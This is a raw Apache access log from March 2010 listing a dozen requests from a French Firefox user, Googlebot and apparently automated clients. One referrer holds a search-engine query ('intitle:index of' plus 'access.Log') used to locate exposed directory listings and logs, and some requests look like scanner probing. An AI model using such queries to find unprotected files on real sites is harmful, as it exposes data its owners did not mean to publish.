82.236.239.55 - - [01/Mar/2010:11:28:54 -0800] "GET /favicon.ico HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
82.236.239.55 - - [01/Mar/2010:11:28:55 -0800] "GET /favicon.ico HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
82.236.239.55 - - [01/Mar/2010:11:30:03 -0800] "GET / HTTP/1.1" 200 5980 "http://www.google.fr/search?hl=fr&client=firefox-a&rls=org.mozilla%3Afr%3Aofficial&q=access.Log+2010+intitle%3A%22index+of+%2F%22&btnG=Rechercher&meta=&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
82.236.239.55 - - [01/Mar/2010:11:30:03 -0800] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://mail.clownjuice.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
82.236.239.55 - - [01/Mar/2010:11:30:03 -0800] "GET /icons/text.gif HTTP/1.1" 200 229 "http://mail.clownjuice.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
82.236.239.55 - - [01/Mar/2010:11:30:05 -0800] "GET /favicon.ico HTTP/1.1" 302 359 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
82.236.239.55 - - [01/Mar/2010:11:30:08 -0800] "GET /favicon.ico HTTP/1.1" 302 359 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
66.249.68.183 - - [01/Mar/2010:13:14:27 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.183 - - [01/Mar/2010:13:14:27 -0800] "GET /ferality-error.log HTTP/1.1" 200 47299 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.154.76.52 - - [01/Mar/2010:13:40:56 -0800] "GET /index.php HTTP/1.1" 302 360 "-" "Mozilla/5.0"
210.154.76.52 - - [01/Mar/2010:13:40:56 -0800] "GET /log-access.log/index.php HTTP/1.1" 302 360 "-" "Mozilla/5.0"
184.73.23.37 - - [01/Mar/2010:14:10:03 -0800] "GET / HTTP/1.0" 200 5981 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50728)"
